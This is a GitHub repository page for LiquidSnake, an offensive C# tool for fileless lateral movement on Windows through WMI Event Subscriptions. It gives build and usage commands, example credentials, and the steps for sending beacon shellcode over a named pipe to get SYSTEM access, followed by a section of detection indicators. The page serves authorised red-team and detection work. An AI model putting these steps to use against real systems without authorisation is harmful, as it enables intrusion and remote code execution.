• Stars
    star
    329
  • Rank 128,030 (Top 3 %)
  • Language
    C#
  • Created about 3 years ago
  • Updated about 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript

Liquid Snake

Liquid Snake is a program aimed at performing lateral movement against Windows systems without touching the disk. The tool relies on WMI Event Subscription in order to execute a .NET assembly in memory, the .NET assembly will listen for a shellcode on a named pipe and then execute it using a variation of the thread hijacking shellcode injection.

The diagram below (hopefully) clarifies the flow of data:

Credits

Intro

The project is composed by two separate solutions:

  • CSharpNamedPipeLoader - the component that will be transformed in VBS via GadgetToJScript
  • LiquidSnake - the component responsible to creating the WMI Event Subscription on the remote system

Building

Simply open both solutions in Visual Studio and build them. Make sure to target x64 architecture for the CSharpNamedPipeLoader. If everything went fine, you should have two separate EXEs: CSharpNamedPipeLoader.exe and LiquidSnake.exe

Using GadgetToJscript, convert the CSharpNamedPipeLoader.exe to VBS using the following command:

GadgetToJScript.exe -a CSharpNamedPipeLoader.exe -b -w vbs

Test the .NET deserialisation using cscript.exe and ensure that everything works as expected:

cscript.exe test.vbs

Then, base64 encode the vbs file and stick it in the LiquidSnake's Program.cs vbscript64 variable at line 29.

I already made this for you so you can just compile the LiquidSnake solution and use it as it is.

Usage

Usage of this project is straightforward, use LiquidSnake.exe agains a host where you have administrative access over as follows:

LiquidSnake.exe <host> [<username> <password> <domain>]
LiquidSnake.exe dc01.isengard.local
LiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local

NOTE: Currently thers is a bug when you explicitly set user credentials, the tool will not work in that case. It is recommended to use make_token or any other impersonation mechanism instead.

If everything went fine, you should obtain an output similar as the following:

[*] Event filter created.
[*] Event consumer created.
[*] Subscription created, now sleeping
[*] Sending some DCOM love..
[*] Sleeping again... long day

The example above uses CobaltStrike's execute-assembly to launch LiquidSnake:

Meanwhile, in the remote host a new named pipe will be created with the following name:

\\.\pipe\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7

Then, using my send_shellcode_via_pipe project from my BOFs you can send an arbitrary shellcode on the remote pipe that will be loaded and executed:

send_shellcode_via_pipe \\dc01\pipe\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7 beacon.bin 

If everything worked as expected, you should obtain a SYSTEM beacon:

NOTE: The current LiquidSnake version contains artefact generated by GadgetToJScript that targets .NET version 4.x. If your target host has only 3.5 installed, this will fail. Simply repeat the same process but using the appropriate .NET version when building GadgetToJScript.

Detection

There are many detection opportunities to identify the abuse of this tool and in general the use of this technique:

  • Creation and deletion of a WMI Event Filter in a short period of time, see Sysmon event IDs 19, 20, 21, 22
  • Module load events for clr.dll related to the scrcons.exe process
  • Creation of a named pipe related to the scrcons.exe process

Additionally, the biggest drawback of the specific implementation is that the shellcode is sent in cleartext over SMB. Meaning that if a network monitor solution is able to inspect that traffic, it is likely that it will stand out. I haven't done much testing against zeek/bro ruleset but I am pretty confident that it will be picked up immediately.

In the detection-artefacts folder I left the PCAP file of a Wireshark capture and the Sysmon events generated during the attack (using Swift On Security's default config).

More Repositories

1

BOFs

Collection of Beacon Object Files (BOFs) for shells and lols
C
100
star
2

TaskShell

C#
50
star
3

talks

42
star
4

bloodhound-playbook

Reproducible and extensible BloodHound playbooks
Python
39
star
5

instagram-insights

A jupyter notebook for extracting meaningful informations about your Instagram profile, like the best time to post and the hashtags that are generating more interactions
Jupyter Notebook
16
star
6

DirSync-Poc

A PoC that uses the DirSync protocol to poll Active Directory for changes
C#
13
star
7

pentesterlab-bootcamp

Writeup of what I'm learning with PentesterLab's Bootcamp
PHP
10
star
8

wild-hunt

A collection of tools and offensive techniques aimed at actively finding adversaries
6
star
9

metasploit_cheatsheet

A comprehensive list of the most useful Metasploit commands I found during my PT activity. Built using Latex/TexWorks
TeX
6
star
10

python_recommender_system

A simple user-based collaborative filtering recommender system, built with Python and Flask
Python
6
star
11

play-scrape

Play Store comment scraper
Jupyter Notebook
5
star
12

GPOPowerParser

A script that parses PowerView's output for GPO analysis. Integrated into bloodhound to find misconfigurations of URA, SMB signing etc
Go
3
star
13

mushrooms-machine-learning

Safe to eat ore deadly poison? Let's use machine learning to find it out. A jupyter notebook that implements a possible solution to the Kaggle challenge, the ML model used is a Random Forest Classifier.
Jupyter Notebook
3
star
14

go-jwt-cracker

A simple GO utility to crack weak JWT secrets
Go
2
star
15

urlscango

A super simple interface for urlscan.io, written in Go.
Go
1
star
16

windows-binaries

1
star
17

RiccardoAncarani

1
star
18

python_offensive_scripts

A collection of Python scripts to automate/help during a pentest
Python
1
star